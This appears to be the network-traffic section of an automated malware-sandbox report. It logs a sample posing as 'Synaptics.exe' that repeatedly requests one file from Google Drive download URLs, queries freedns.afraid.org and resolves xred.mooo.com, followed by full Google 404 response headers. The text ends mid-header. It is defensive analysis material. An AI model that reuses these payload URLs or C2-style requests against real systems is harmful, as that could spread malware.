                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache
                                Source: global trafficDNS traffic detected: DNS query: docs.google.com
                                Source: global trafficDNS traffic detected: DNS query: xred.mooo.com
                                Source: global trafficDNS traffic detected: DNS query: freedns.afraid.org
                                Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6uJSEM2CSen1Mx2LBZYTTh5MA9ZjtLvumIy0FuHZPqh1I0yLf2MYXUck0Pb1qJa4QnContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:35:56 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-uEo7EtXNFFLfbgUy3hodTg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=RqDXBJunwwjj2_C9QPMQBvl40xPXXJ0y_fIC7Up7BSsJU4ulAIR3W4UGJa019yDdcw-wU2ZCjiWOf6Jj4qcrHWJB3js1k8IA-AFK1jiyJsHPeBg6Vie9fWRBqVpuNHeGBLEqQFDOfY3JM5cdCJbfnFxHup-jxh0_JlhrUKdSpndAWo109eAkm-E; expires=Tue, 01-Jul-2025 10:35:56 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5Jir9ahu3x9JHDu-iNVkGTcF3O2oLQ-MSM2Z95ZgFRLJG4bt5nmMdUjkgXVnQdJCSxikhX7ZsContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:35:56 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-h5BQBnGjmxsHdAXq3bbYgQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerSet-Cookie: NID=520=ANMwnx3g6cBhV0fFuX_RPPjvQ4YdkR1XvD6cxsmRyYxgLijsrrji59j-0abUEVZdnYs8a0qNq0sA_OsXLmRfKnekCyrRWoZqfgI2KO46A4ZYYOhuxohr01hnix2SH6LZz_KDx8BxOffaeHLMuzZ3yHZGijtnZrgvuwg0VPQu9C0ipgeEOJ035FM; expires=Tue, 01-Jul-2025 10:35:56 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4jUZnsR7ku8pekom5Ye6kOr9KT8qbukHhbmrcjIDOdfSrIY4oS3P9yKCWaHq3rmTRWContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:35:57 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-jvGhEtF5kKiK_-35SBjT2Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM; expires=Tue, 01-Jul-2025 10:35:57 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6QsfvN0XFAJPuyW2cZohGwamupZR-3NhBfwZfId8hoWRXNA31xFdcdcwbCamYUGka9sfIf0J8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:35:57 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-jyvUoBjvlAeuxqSmTk6WDQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, 